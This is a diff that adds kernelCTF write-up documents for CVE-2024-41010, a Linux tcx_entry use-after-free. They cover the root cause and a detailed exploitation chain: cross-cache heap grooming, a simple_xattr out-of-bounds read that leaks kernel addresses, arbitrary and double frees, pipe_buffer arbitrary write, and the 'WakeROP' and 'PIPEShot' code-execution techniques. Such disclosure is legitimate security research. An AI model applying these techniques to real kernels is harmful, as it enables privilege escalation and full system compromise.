diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md new file mode 100644 index 00000000..206757a6 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/exploit.md @@ -0,0 +1,470 @@ +# Exploit detail about CVE-2024-41010 + +## Primitive +When UAF triggered at `uaf_chunk`, we can modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value. + +## Leak kBase and Controlable kHeap +### Trigger Cross-Cache (kmalloc-2k -> per-cpu buddy) +From [Trigger Vulnerability](#trigger-vulnerability), we know that UAF can be triggered at `kmalloc-2k`. There arn't exist appropriate controlable structure in `kmalloc-2k`, so we need to trigger cross-cache to control `uaf` content. + +In our exploit, we spray `kmalloc-2k` by using `struct super_block`. We can `mount` and `unmount` tmpfs, and it alloc / free only 1 `kmalloc-2k` chunk for each call. +```c++ +struct super_block { + struct list_head s_list; /* 0 16 */ + dev_t s_dev; /* 16 4 */ + unsigned char s_blocksize_bits; /* 20 1 */ + + /* XXX 3 bytes hole, try to pack */ + + long unsigned int s_blocksize; /* 24 8 */ + loff_t s_maxbytes; /* 32 8 */ + struct file_system_type * s_type; /* 40 8 */ + const struct super_operations * s_op; /* 48 8 */ + const struct dquot_operations * dq_op; /* 56 8 */ + /* --- cacheline 1 boundary (64 bytes) --- */ + const struct quotactl_ops * s_qcop; /* 64 8 */ + const struct export_operations * s_export_op; /* 72 8 */ + long unsigned int s_flags; /* 80 8 */ + long unsigned int s_iflags; /* 88 8 */ + long unsigned int s_magic; /* 96 8 */ + struct dentry * s_root; /* 104 8 */ + struct rw_semaphore s_umount; /* 112 40 */ + + [...] 
+ + /* XXX 4 bytes hole, try to pack */ + + struct list_head s_inodes_wb; /* 1376 16 */ + + /* size: 1408, cachelines: 22, members: 58 */ + /* sum members: 1321, holes: 8, sum holes: 71 */ + /* padding: 16 */ + /* forced alignments: 3, forced holes: 1, sum forced holes: 44 */ +} __attribute__((__aligned__(64))); +``` + +### Trigger Cross-Cache (per-cpu buddy -> kmalloc-cg-2k) +--- +When we use Cross-Cache, for stability, we must cross-cache same order with `kmalloc-2k`. Therefore, we need to trigger cross-cache from `per-cpu buddy` to `kmalloc-cg-2k`. + +In our exploit, we use `struct simple_xattr` as cross-cache's uaf victim. The shape of `struct simple_xattr` is as follows: +```c++ +struct simple_xattr { + struct rb_node rb_node __attribute__((__aligned__(8))); /* 0 24 */ + char * name; /* 24 8 */ + size_t size; /* 32 8 */ + char value[]; /* 40 0 */ + + /* size: 40, cachelines: 1, members: 4 */ + /* forced alignments: 1 */ + /* last cacheline: 40 bytes */ +} __attribute__((__aligned__(8))); +``` + +So, by using Cross-Cache, we overlap `struct simple_xattr` with `uaf_chunk` + +### Modify `struct simple_xattr`'s `size` +At [Trigger Vulnerability](#trigger-vulnerability), we know that can modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value. Therefore, by overlapping, we can control `struct simple_xattr`'s `size` as `start_poll_synchronize_rcu()` return value. + +The import things is that the first value of `struct simple_xattr` is `rb_node`. The `struct rb_node` is as follows: +```c++ +struct rb_node { + long unsigned int __rb_parent_color; /* 0 8 */ + struct rb_node * rb_right; /* 8 8 */ + struct rb_node * rb_left; /* 16 8 */ + + /* size: 24, cachelines: 1, members: 3 */ + /* last cacheline: 24 bytes */ +} __attribute__((__aligned__(8))); +``` + +Therefore, `uaf_chunk[0]` is `(struct rb_node *)uaf_chunk -> __rb_parent_color`. 
`__rb_parent_color` is constructed as follows: +```c++ +#define RB_RED 0 +#define RB_BLACK 1 + +__rb_parent_color = (unsigned long)parent | color; +``` + +Therefore, we must set the parent color of the `struct simple_xattr` which is overlapped with `uaf_chunk` as `RB_RED`. By doing this, we can control `struct simple_xattr`'s `size` as `start_poll_synchronize_rcu()` return value. + +So, we need to construct the structures' allocation as follows: +``` + ------------------ + ╭--> | parent | + | ------------------ + | + ------------------ ------------------ +uaf_chunk -> | rchild | | lchild | + ------------------ ------------------ +``` + +When we modify `uaf_chunk[0][0x20, 0x28)` to `start_poll_synchronize_rcu()` return value, we can change `parent->size` as `start_poll_synchronize_rcu()` return value. + +From [Cross-Cache (per-cpu buddy -> kmalloc-cg-2k)](#cross-cache-per-cpu-buddy---kmalloc-cg-2k), the `lchild` must use `kmalloc-cg-2k` and we can freely choose `parent`'s slab cache on `kmalloc-cg-64 ~ kmalloc-cg-4k` and `8k, 16k, 32k` managed by the buddy allocator. + +### Bypass CONFIG_HARDENED_USERCOPY +The kernel has the config CONFIG_HARDENED_USERCOPY, which makes it impossible to copy out-of-bounds slab kernel memory via `copy_to_user()`. However, `simple_xattr_alloc()` allocates kernel memory and the data is copied there first([1]). After that, `copy_to_user()` is executed([2]). For this reason, if we can overwrite the `struct simple_xattr` size to any size below `XATTR_SIZE_MAX (0x10000)`, leaking out-of-bounds slab kernel memory becomes possible.
+```cpp +ssize_t +do_getxattr(struct mnt_idmap *idmap, struct dentry *d, + struct xattr_ctx *ctx) +{ + ssize_t error; + char *kname = ctx->kname->name; + + if (ctx->size) { + if (ctx->size > XATTR_SIZE_MAX) + ctx->size = XATTR_SIZE_MAX; + ctx->kvalue = kvzalloc(ctx->size, GFP_KERNEL); // [1] + if (!ctx->kvalue) + return -ENOMEM; + } + + if (is_posix_acl_xattr(ctx->kname->name)) + error = do_get_acl(idmap, d, kname, ctx->kvalue, ctx->size); + else + error = vfs_getxattr(idmap, d, kname, ctx->kvalue, ctx->size); + if (error > 0) { + if (ctx->size && copy_to_user(ctx->value, ctx->kvalue, error)) // [2] + error = -EFAULT; + } else if (error == -ERANGE && ctx->size >= XATTR_SIZE_MAX) { + /* The file system tried to returned a value bigger + than XATTR_SIZE_MAX bytes. Not possible. */ + error = -E2BIG; + } + + return error; +} +``` + +### OOB Read at `parent` Chunk +#### Leak Controlable kHeap +From [bypass CONFIG_HARDENED_USERCOPY](#bypass-config_hardened_usercopy), we can read out-of-bounds information of slab cache eventhought `CONFIG_HARDENED_USERCOPY` is enabled. + +WLOG, consider that `parent` is `kmalloc-cg-256` and we spray many `struct simple_xattr`. Then, we can read out-of-bounds information of `kmalloc-cg-256` slab cache. It is shown as follows: +``` + -------------------------------------- +| parent.rb_node | +| parent.name | +| parent.size | +| parent.value | + -------------------------------------- +| xattr<1>.rb_node | +| xattr<1>.name | +| xattr<1>.size | +| xattr<1>.value | + -------------------------------------- +``` + +Therefore, by using OOB read, we can leak `kHeap` address by read `xattr1.rb_node`'s address. The important thing is we can give value at `xattr<*>.value`. Therefore, by reading `xattr<*>.value` and `xattr<*>.rb_node`'s value, we can identify `xattr<*>`'s `lchild`, `rchild`, and `parent`'s kernel address clearly. It dramatically increase the stability of the exploit. + +We can free known kernel address whenever we want. 
+ +#### Leak kbase +When we read OOB data of `parent`, we can read `kbase` address which remained as a uninitialized value. + +## Obtain Arbitrary Address Free Primitive +### Cross-Cache (kmalloc-2k -> kmalloc-32k) +By proceeding process at [Trigger Cross-Cache (kmalloc-2k -> per-cpu buddy)](#trigger-cross-cache-kmalloc-2k---per-cpu-buddy), and reallocate to `kmalloc-32k`(not slab cache, but buddy. For convenience, we will call like that). `kmalloc-2k` cache and `kmalloc-32k` cache is same order(order 3), so we can reallocate to `kmalloc-32k` cache. + +Then the status of memory is shown as follows: +``` + -------- kmalloc-32k --------- +| ... | +| uaf_chunk | +| ... | + ------------------------------ +``` + +uaf_chunk was in `kmalloc-2k` slab cache, so if cross-cached, it will be in somewhere in `kmalloc-32k` slab cache. Then, If we overlap `uaf_chunk` with `struct simple_xattr` which is the size of `kmalloc-32k`, we can modify `uaf_chunk[0]`'s address freely. The reason is that `uaf_chunk[0]` is will be placed on somewhere in `struct simple_xattr.value[]`. + +### Modify `struct simple_xattr.rb_node->parent.rb_right` +From [Cross-Cache (kmalloc-2k -> kmalloc-32k)](#cross-cache-kmalloc-2k---kmalloc-32k), we can modify `uaf_chunk[0]`'s address freely and from [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk), we know the `xattr<*>`'s `lchild`, `rchild`, and `parent`'s kernel address. + +Let assume that `uaf_chunk[0]`'s address is `xattr<1>.parent - 0x1f` which set at [Cross-Cache (kmalloc-2k -> kmalloc-32k)](#cross-cache-kmalloc-2k---kmalloc-32k). + +Then the status of memory is shown as follows: +``` + -------- uaf_chunk -------- offset +| xattr<1>.parent - 0x1f | -----> | .... | -0x1f +| ... | | .... | -0x17 + --------------------------- | .... | -0xf + | .... | -0x7 + ------ xattr<1>.parent + 1 ------ + | .... | +0x1: xattr<1>.parent + 1 + | .... 
| + --------------------------------- +``` + +Then, when we trigger [Trigger Vulnerability](#trigger-vulnerability), we can modify `xattr<1>.parent[1, 9)` to `start_poll_synchronize_rcu()` return value. And we know that `start_poll_synchronize_rcu()`'s 7th byte is `0x00`. + +After trigger UAF write and observe memory from the perspective of `struct xattr<1>.parent`. It is shown as follows: +``` + ------------- xattr<1>.parent ------------- +| start_poll_synchronize_rcu() value | ?? | +| xattr<1> address | 00 | +| ... | + ------------------------------------------- +``` + +So, we trigger off-by-one at `xattr<1>.parent`. + +### Trigger (Weak) Arbitrary Address Free +Let `xattr<1>.rb_node.parent->rb_right` is allocated in `kmalloc-cg-192`. + +#### Why `kmalloc-cg-192`? It was `kmalloc-cg-256`! +We can make `Let xattr<1>.rb_node.parent->rb_child` by proceeding like below. + +1. allocate `kmalloc-cg-256` : `xattr<1>.parent` +2. allocate `kmalloc-cg-2k` : `xattr<1>` +3. leak `xattr<1>.parent`'s address : from [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk) +4. free `xattr<1>` +5. allocate `kmalloc-cg-192` : `xattr<1>.rb_node.parent->rb_child` + +Then, we change `kmalloc-cg-256` to `kmalloc-cg-192`. + +For convinience, let's call `rb_child` by `rchild`. + +Then, when kernel tried to access to `xattr<1>`(`kmalloc-cg-192`), it accessed to `xattr<1> & ~(0xff)` because of [Modify `struct simple_xattr.rb_node->parent.rb_right`](#modify-struct-simple_xattrrb_node-parentrb_right). + +The `kmalloc-cg-192` has 4 cases when off-by-one triggered. It is shown as follows: +1. `xattr<1> & 0x3ff` is `0x000` + - `xattr<1> & ~(0xff)` is same with `xattr<1>`, so nothing changed. +2. `xattr<1> & 0x3ff` is `0x0c0` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0xc0`, so point other sprayed `&struct simple_xattr.rb_node`. +3. `xattr<1> & 0x3ff` is `0x180` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0x80`, so point other sprayed `&struct simple_xattr.value[0x18]`. +4. 
`xattr<1> & 0x3ff` is `0x240` + - `xattr<1> & ~(0xff)` is `xattr<1> - 0x40`, so point other sprayed `&struct simple_xattr.value[0x58]`. + +Therefore, when `xattr<1> & 0x3ff == 0x180` or `xattr<1> & 0x3ff == 0x240`, we can use `simple_xattr.value[]` as fake `struct simple_xattr`. + +Therefore, when we set value to `struct simple_xattr.value` as fake chunk, trigger off-by-one, and delete `xattr<1>`, `xattr<1>->name` will be freed. + +Therefore, we can free arbitrary address where we can set `xattr<1>->name`'s prefix as `"security."` (for remove xattr, prefix condition must be satisfied because code find xattr by `xattr<1>->name`). + +## Trigger Double Free +Now, we will trigger double-free on `kmalloc-cg-64` slab cache. + +### Hmm, how we know `kmalloc-cg-64`'s address? +From [OOB Read at `parent` Chunk](#oob-read-at-parent-chunk), we can read out-of-bounds information of slab cache. Therefore, by setting `rchild` as `kmalloc-cg-256`, and `rchild->name` to `kmalloc-cg-64` chunk, we can leak `kmalloc-cg-64`'s address. Also, we can free `kmalloc-cg-64` anytime we want! + +Therefore, when we allocate chunk to satisfy Precondition, we can trigger double free +- Precondition: prefix of `&rchild->name[0x28]` is `"security."`(for satisfy [Trigger (Weak) Arbitrary Address Free](#trigger-weak-arbitrary-address-free)) condition + +Let's call each chunk as `double_free_rchild` and `double_free_fake_xattr`. + +## Arbitrary Address Write & Arbitrary Address Execute +Before AAW, AAE, abstract our primitive. 
+- When free `double_free_rchild`, we can free `double_free_chunk` +- When free `double_free_fake_xattr`, we can free `double_free_chunk + 0x28` +- `double_free_chunk` is `kmalloc-64` + +as diagram, it is shown as follows: +``` +offset --------- double_free_rchild --------- ++0x00 | | ++0x08 | | ++0x10 | | ++0x18 | | ++0x20 | | + ------- double_free_fake_xattr ------- ++0x28 | | | ++0x30 | | | ++0x38 | | | + -------------------------------------- | ++0x40 | | ++0x48 | | ++0x50 | | ++0x58 | | ++0x60 | | + -------------------------------------- +``` + +### Leak VMEMMAP_BASE +Proceding like below, we can leak `VMEMMAP_BASE`. +1. free `double_free_fake_xattr` +2. allocate `struct pipe_buffer` at freed `double_free_chunk` +3. free `double_free_rchild` +4. allocate `struct msg_msgseg` at freed `double_free_chunk` +5. call `pipe_write()`(it allocate vmemmap address at `struct pipe_buffer->page`) +6. read `struct pipe_buffer->page`'s address by read `struct msg_msg` + +each struct are as follows: +```c++ +struct msg_msg { + struct list_head m_list; /* 0 16 */ + long int m_type; /* 16 8 */ + size_t m_ts; /* 24 8 */ + struct msg_msgseg * next; /* 32 8 */ + void * security; /* 40 8 */ + + /* size: 48, cachelines: 1, members: 5 */ + /* last cacheline: 48 bytes */ +}; + +struct msg_msgseg { + struct msg_msgseg * next; /* 0 8 */ + + /* size: 8, cachelines: 1, members: 1 */ + /* last cacheline: 8 bytes */ +}; + +struct pipe_buffer { + struct page * page; /* 0 8 */ + unsigned int offset; /* 8 4 */ + unsigned int len; /* 12 4 */ + const struct pipe_buf_operations * ops; /* 16 8 */ + unsigned int flags; /* 24 4 */ + + /* XXX 4 bytes hole, try to pack */ + + long unsigned int private; /* 32 8 */ + + /* size: 40, cachelines: 1, members: 6 */ + /* sum members: 36, holes: 1, sum holes: 4 */ + /* last cacheline: 40 bytes */ +}; + +struct pipe_buf_operations { + int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *); /* 0 8 */ + void (*release)(struct pipe_inode_info *, struct 
pipe_buffer *); /* 8 8 */ + bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *); /* 16 8 */ + bool (*get)(struct pipe_inode_info *, struct pipe_buffer *); /* 24 8 */ + + /* size: 32, cachelines: 1, members: 4 */ + /* last cacheline: 32 bytes */ +}; +``` + +when step(5), the memory is shown as follows: +``` +offset --------- struct msg_msgseg --------- ++0x00 | next | ++0x08 | msg_msgseg.data[0, 8) | ++0x10 | ... | ++0x18 | | ++0x20 | | + --------- struct pipe_buffer --------- ++0x28 | msg_msgseg.data[0x20, 0x28) | pipe_buffer->page | ++0x30 | | | ++0x38 | | | + -------------------------------------- | ++0x40 | | ++0x48 | | ++0x50 | | ++0x58 | | ++0x60 | | + -------------------------------------- +``` + +So, we can obtain VMEMMAP_BASE. + + +### Arbitrary Address Write +Using `struct pipe_buffer`, we can write arbitrary address. From `pipe_write()`, we can write arbitrary address to `pipe_buffer->page`. +```c++ +static ssize_t +pipe_writev(struct file *filp, const struct iovec *_iov, + unsigned long nr_segs, loff_t *ppos) +{ + struct inode *inode = filp->f_dentry->d_inode; + struct pipe_inode_info *info; + ssize_t ret; + int do_wakeup; + struct iovec *iov = (struct iovec *)_iov; + size_t total_len; + ssize_t chars; + + [...] 
+ + chars = total_len & (PAGE_SIZE-1); /* size of the last buffer */ + if (info->nrbufs && chars != 0) { + int lastbuf = (info->curbuf + info->nrbufs - 1) & (PIPE_BUFFERS-1); + struct pipe_buffer *buf = info->bufs + lastbuf; + struct pipe_buf_operations *ops = buf->ops; + int offset = buf->offset + buf->len; + if (ops->can_merge && offset + chars <= PAGE_SIZE) { + void *addr = ops->map(filp, info, buf); + int error = pipe_iov_copy_from_user(offset + addr, iov, chars); + ops->unmap(info, buf); + ret = error; + do_wakeup = 1; + if (error) + goto out; + buf->len += chars; + total_len -= chars; + ret = chars; + if (!total_len) + goto out; + } + } + + for (;;) { + int bufs; + if (!PIPE_READERS(*inode)) { + send_sig(SIGPIPE, current, 0); + if (!ret) ret = -EPIPE; + break; + } + bufs = info->nrbufs; + if (bufs < PIPE_BUFFERS) { + int newbuf = (info->curbuf + bufs) & (PIPE_BUFFERS-1); + struct pipe_buffer *buf = info->bufs + newbuf; + struct page *page = info->tmp_page; + int error; + + if (!page) { + page = alloc_page(GFP_HIGHUSER); + if (unlikely(!page)) { + ret = ret ? : -ENOMEM; + break; + } + info->tmp_page = page; + } + /* Always wakeup, even if the copy fails. Otherwise + * we lock up (O_NONBLOCK-)readers that sleep due to + * syscall merging. + * FIXME! Is this really true? + */ + do_wakeup = 1; + chars = PAGE_SIZE; + if (chars > total_len) + chars = total_len; + + error = pipe_iov_copy_from_user(kmap(page), iov, chars); + + [...] + +out: + up(PIPE_SEM(*inode)); + if (do_wakeup) { + wake_up_interruptible(PIPE_WAIT(*inode)); + kill_fasync(PIPE_FASYNC_READERS(*inode), SIGIO, POLL_IN); + } + if (ret > 0) + inode_update_time(inode, 1); /* mtime and ctime */ + return ret; +} +``` + +However, the address of `pipe_buffer->page` is on vmemmap_base. Therefore, we should write converted address at `pipe_buffer->page`. 
+ +The calculation proceeds as below: +```c++ +uint64_t virt_to_page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base) +{ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} +``` + +Now, we can write our input at an arbitrary address. We have already leaked `kbase`, `kheap`, and `vmemmap_base`, so we can write our input at an arbitrary address. + +### Arbitrary Address Execute +`struct pipe_buffer` has `struct pipe_buf_operations`, and `struct pipe_buf_operations->release()` is called when `pipe_buffer` is freed. Therefore, we can execute an arbitrary address by setting `struct pipe_buffer->ops` as the address of `struct msg_msgseg` and writing the address we want to call at `struct msg_msgseg[0x8:0x10)`. + +Then, when `pipe_buffer` is freed, `struct pipe_buffer->ops->release()` is called and we can execute an arbitrary address. + +## Oneshot Like Arbitrary Code Execution +The details of AAW and RIP pivoting are shown at [novel_techniques.md](novel_techniques.md#PIPEShot) \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md new file mode 100644 index 00000000..a985f01c --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/novel_techniques.md @@ -0,0 +1,210 @@ +# Novel Technique of exp183 + +## Rollback of Unsafe Unlink with `struct simple_xattr` +In kernel 6.1, `struct simple_xattr` used a list structure to store the data, so corrupting kernel memory using unsafe unlink was prevented. However, in 6.6, the data structure was changed to an Rbtree and the Rbtree doesn't have any mitigation for linking and unlinking. +```cpp +struct simple_xattr { + struct rb_node rb_node; + char *name; + size_t size; + char value[]; +}; +``` + +Therefore, we can use this property for exploiting. +The insertion of an Rbtree node occurs at `rb_link_node()` and this function just links the `rb_node`.
+```cpp +static inline void rb_link_node(struct rb_node *node, struct rb_node *parent, + struct rb_node **rb_link) +{ + node->__rb_parent_color = (unsigned long)parent; + node->rb_left = node->rb_right = NULL; + + *rb_link = node; +} +``` + +Similarly, the deletion of an Rbtree node occurs at `rb_erase()` and the main logic is `__rb_erase_augmented()` which is called from `rb_erase()`. Let's consider a very simple state, only one parent and two children, and try to remove one of the children. Then this code runs `rb_set_parent_color()`.([1]) +```cpp +static __always_inline struct rb_node * +__rb_erase_augmented(struct rb_node *node, struct rb_root *root, + const struct rb_augment_callbacks *augment) +{ + struct rb_node *child = node->rb_right; + struct rb_node *tmp = node->rb_left; + struct rb_node *parent, *rebalance; + unsigned long pc; + + { + + [...] + + tmp = node->rb_left; + WRITE_ONCE(successor->rb_left, tmp); + rb_set_parent(tmp, successor); + + pc = node->__rb_parent_color; + tmp = __rb_parent(pc); + __rb_change_child(node, successor, tmp, root); + + if (child2) { + rb_set_parent_color(child2, parent, RB_BLACK); // [1] + rebalance = NULL; + } else { + rebalance = rb_is_black(successor) ? parent : NULL; + } + successor->__rb_parent_color = pc; + tmp = successor; + } + + augment->propagate(tmp, NULL); + return rebalance; +} +``` + +The `rb_set_parent_color()` doesn't have any validation against linked Rbtree corruption, so unsafe unlink is possible. It allows writing any accessible kernel address to any kernel address. Furthermore, the kernel doesn't panic even though the Rbtree node is corrupted. This potentially enables various types of exploitation.
+```cpp +static inline void +__rb_change_child(struct rb_node *old, struct rb_node *new, + struct rb_node *parent, struct rb_root *root) +{ + if (parent) { + if (parent->rb_left == old) + WRITE_ONCE(parent->rb_left, new); + else + WRITE_ONCE(parent->rb_right, new); + } else + WRITE_ONCE(root->rb_node, new); +} +``` + +exp183 uses this primitive in two ways. +1. The corruption of Rbtree node data doesn't trigger a kernel panic, so we can freely free a corrupted `struct simple_xattr` without any consideration. +2. Overwrite 1 byte of `node->rb_node.rb_right` to `0x00`(make fake_chunk) and use fake_chunk freely for triggering double_free and UAF. + +## Oneshot in Kernel: WakeROP +RIP pivoting alone is not that powerful because we usually need ROP to exploit. Also, we need to spend much time finding proper gadgets, and they change every time. We usually solve this problem depending only on the registers and a few proper gadgets. + +However, there exists a powerful gadget in `wakeup_long64()`. +```asm +SYM_FUNC_START(wakeup_long64) + movq saved_magic, %rax + movq $0x123456789abcdef0, %rdx + cmpq %rdx, %rax + je 2f + + /* stop here on a saved_magic mismatch */ + movq $0xbad6d61676963, %rcx +1: + jmp 1b +2: + movw $__KERNEL_DS, %ax + movw %ax, %ss + movw %ax, %ds + movw %ax, %es + movw %ax, %fs + movw %ax, %gs + movq saved_rsp, %rsp + + movq saved_rbx, %rbx + movq saved_rdi, %rdi + movq saved_rsi, %rsi + movq saved_rbp, %rbp + + movq saved_rip, %rax + ANNOTATE_RETPOLINE_SAFE + jmp *%rax +SYM_FUNC_END(wakeup_long64) +``` + +This code copies general-purpose registers from variables, even `rip` and `rsp`. When you see this code in vmlinux, it copies all registers from the code's `bss` and jumps to the `rax` address. +Therefore, merely writing some addresses to the `saved_*` section gives full control of the system.
+``` + 0xffffffff8112c291 : mov rsp,QWORD PTR ds:0xffffffff83c51a68 + 0xffffffff8112c299 : mov rbx,QWORD PTR ds:0xffffffff83c51a58 + 0xffffffff8112c2a1 : mov rdi,QWORD PTR ds:0xffffffff83c51a50 + 0xffffffff8112c2a9 : mov rsi,QWORD PTR ds:0xffffffff83c51a48 + 0xffffffff8112c2b1 : mov rbp,QWORD PTR ds:0xffffffff83c51a40 + 0xffffffff8112c2b9 : mov rax,QWORD PTR ds:0xffffffff83c51a60 + 0xffffffff8112c2c1 : jmp rax +``` + +There are so many ways to apply this technique to exploit. exp184 also use this technique for exploiting. +This technique is helpful for below situation. + +0. Generally, + - it can be used when there is insufficient ROP space. + - it can be used when there is no proper gadget. (by calling `set_memory_x(saved_*)` and make arbitrary gadget) +1. UAF & Cross Cache Avaliable + - use [PIPEShot](#oneshot-in-kernel-wakerop): kernelctf exp183 +2. Only know kbase (by leak or side channel) & RIP pivoting + - use CEA (`write_cpu_entry_area`) + WakeROP: kernelctf exp184 + +## PIPEShot +Only [OneShot in Kernel: WakeROP](#oneshot-in-kernel-wakerop) is strong enough to exploit, but not general. We want to introduce PIPEShot, which is generally utilized for UAF exploit + +1. cross cache is available + - generally used for all SLAB UAF +2. cross cache is not availablex + - generally used for `kmalloc-cg-<64, 192, 512, and over>` SLAB UAF + +The main flow of PIPEShot is below. + +0. Let we know `kbase` and `kheapbase` address + - `kbase` is easily leaked by UAF or side channel + - `kheapbase` is easily leaked when UAF is available +1. Create pipe + - let `pipeshot_pipe` +``` + ----------- pipeshot_pipe ----------- +| | +| | + ------------------------------------- +``` +2. Trigger UAF +3. Alloc any object which user can R/W (e.g. 
`struct simple_xattr` or `struct msg_msgseg`) + - let `pipeshot_data`, then `pipeshot_pipe` and `pipeshot_data` are duplicated +``` + ----------- pipeshot_pipe ----------- ------------ pipeshot_data ---------- +| | | +| | | +| | | +| | | + ------------------------------------- ------------------------------------- +``` +4. Write to pipe + - If user write some data to pipe, save `VMEMMAP_BASE + alpha` addr to `pipeshot_pipe->buffer` +``` +----------- pipeshot_pipe ----------- ------------ pipeshot_data ---------- +| page | | +| offset | | +| len | | +| ops | | +| | | +------------------------------------- ------------------------------------- +``` +5. Read from `pipeshot_data` + - `pipeshot_pipe` and `pipeshot_data` are duplicated, so read from `pipeshot_data` can leak `pipeshot_pipe->buffer` address. Then we can leak `VMEMMAP_BASE` address. +6. Overwrite `pipeshot_pipe->buffer` to `virt_to_page(saved_*, kheapbase, vmemmap_base)` and set `pipeshot_pipe->ops->release` to `wakeup_long64 + 49`. + - It can be done by alloc any object which user can R/W (e.g. `struct simple_xattr` or `struct msg_msgseg`) and write data on it. +```c++ +uint64_t virt_to_page(uint64_t virt, uint64_t kheap_base, uint64_t vmemmap_base) +{ + return (((virt - kheap_base) >> 0xc) << 0x6) + vmemmap_base; +} +``` +``` +----------- pipeshot_pipe ----------- ------------------ pipeshot_data2 ------------------- +| | virt_to_page(saved_*, kheapbase, vmemmap_base) | +| offset | | +| len | | +| | pipeshot_pipe + 0x18 |────┐ +| | |<───┘ +| | = wakeup_long64 + 49 | +| | | +------------------------------------- ----------------------------------------------------- +``` +8. Write to pipe + - Then, we can write any value to `saved_*` and ROP chain. Limitation of size is `0x1000` so it is enought to construct ROP chain. +9. Trigger ROP chain + - we can trigger WakeROP by freeing pipe. 
\ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md new file mode 100644 index 00000000..9ce08ab2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-41010_lts/docs/vulnerability.md @@ -0,0 +1,191 @@ +# Vulnerability detail about CVE-2024-41010 + +## Trigger Vulnerability + +The vulnerability occurs because `tcx_entry_fetch_or_create()`, which allocates `tcx_entry` objects, does not manage these objects using a reference count-based system. As a result, functions such as `clsact_init()`, `ingress_init()`, and `tcx_prog_attach()` are affected. + +The `tcx_entry_fetch_or_create()` is called in the following call stack when creating ingress qdisc/clsact qdisc: + +```c +rtnetlink_rcv_msg() + => tc_modify_qdisc() + => qdisc_create() + => ingress_init() + => tcx_entry_fetch_or_create() + => qdisc_graft() +``` + +This function calls `tcx_entry_create()` to allocate and link a new `tcx_entry` if none is registered with the network device [1]. If a `tcx_entry` is already registered, it retrieves it by calling `tcx_entry_fetch()` [2]. 
+ +```c +static inline struct bpf_mprog_entry * +tcx_entry_fetch(struct net_device *dev, bool ingress) +{ + ASSERT_RTNL(); + if (ingress) + return rcu_dereference_rtnl(dev->tcx_ingress); // <==[3] + else + return rcu_dereference_rtnl(dev->tcx_egress); +} + +static inline struct bpf_mprog_entry * +tcx_entry_fetch_or_create(struct net_device *dev, bool ingress, bool *created) +{ + struct bpf_mprog_entry *entry = tcx_entry_fetch(dev, ingress); // <==[2] + + *created = false; + if (!entry) { + entry = tcx_entry_create(); // <==[1] + if (!entry) + return NULL; + *created = true; + } + return entry; +} + +static int ingress_init(struct Qdisc *sch, struct nlattr *opt, + struct netlink_ext_ack *extack) +{ + struct ingress_sched_data *q = qdisc_priv(sch); + struct net_device *dev = qdisc_dev(sch); + struct bpf_mprog_entry *entry; + bool created; + int err; + + if (sch->parent != TC_H_INGRESS) + return -EOPNOTSUPP; + + net_inc_ingress_queue(); + + entry = tcx_entry_fetch_or_create(dev, true, &created); + if (!entry) + return -ENOMEM; + tcx_miniq_set_active(entry, true); + mini_qdisc_pair_init(&q->miniqp, sch, &tcx_entry(entry)->miniq); // <==[4] + if (created) + tcx_entry_update(dev, entry, true); + + q->block_info.binder_type = FLOW_BLOCK_BINDER_TYPE_CLSACT_INGRESS; + q->block_info.chain_head_change = clsact_chain_head_change; + q->block_info.chain_head_change_priv = &q->miniqp; + + err = tcf_block_get_ext(&q->block, sch, &q->block_info, extack); + if (err) + return err; + + mini_qdisc_pair_block_init(&q->miniqp, q->block); + + return 0; +} +``` + +The issue arises because there is no logic to increment the refcount, regardless of whether a `tcx_entry` is newly allocated or retrieved. This oversight can lead to problems down the line [3]. + +The `&tcx_entry->miniq` of this `tcx_entry` is stored in `miniqp->p_miniq` within `mini_qdisc_pair_init()` [4] and is subsequently used as a double pointer [5].
+ +```c +void mini_qdisc_pair_init(struct mini_Qdisc_pair *miniqp, struct Qdisc *qdisc, + struct mini_Qdisc __rcu **p_miniq) +{ + miniqp->miniq1.cpu_bstats = qdisc->cpu_bstats; + miniqp->miniq1.cpu_qstats = qdisc->cpu_qstats; + miniqp->miniq2.cpu_bstats = qdisc->cpu_bstats; + miniqp->miniq2.cpu_qstats = qdisc->cpu_qstats; + miniqp->miniq1.rcu_state = get_state_synchronize_rcu(); + miniqp->miniq2.rcu_state = miniqp->miniq1.rcu_state; + miniqp->p_miniq = p_miniq; // <==[5] +} +EXPORT_SYMBOL(mini_qdisc_pair_init); +``` + +Next, `chain0` is linked to the `tc block` in the following call stack. Here, the `tc block` is pre-created with index 1 when the `ingress qdisc` is first allocated and references the `ingress qdisc`: + +```c +rtnetlink_rcv_msg() + => tc_ctl_chain() +``` + +Next, when a `clsact qdisc` is allocated to a network device that already has an `ingress qdisc`, the existing `ingress qdisc` is released and replaced by the `clsact qdisc` in the following call stack. During this process, the `tcx_entry` is also released: + +```c +rtnetlink_rcv_msg() + => tc_modify_qdisc() + => qdisc_create() + => clsact_init() + => tcf_block_get_ext() + => tcf_chain0_head_change_cb_add() + => qdisc_graft() + => qdisc_destroy() + => __qdisc_destroy() + => ingress_destroy() + => tcx_entry_free() + => kfree_rcu() +``` + +In the process of allocating this clsact qdisc, the `tcf_chain0_head_change_cb_add()` function is called. Since `chain0` was previously assigned to the `tc block` with index 1, connecting this `clsact qdisc` to the tc block with index 1 will also link an item to `&block->chain0.filter_chain_list` [6]. 
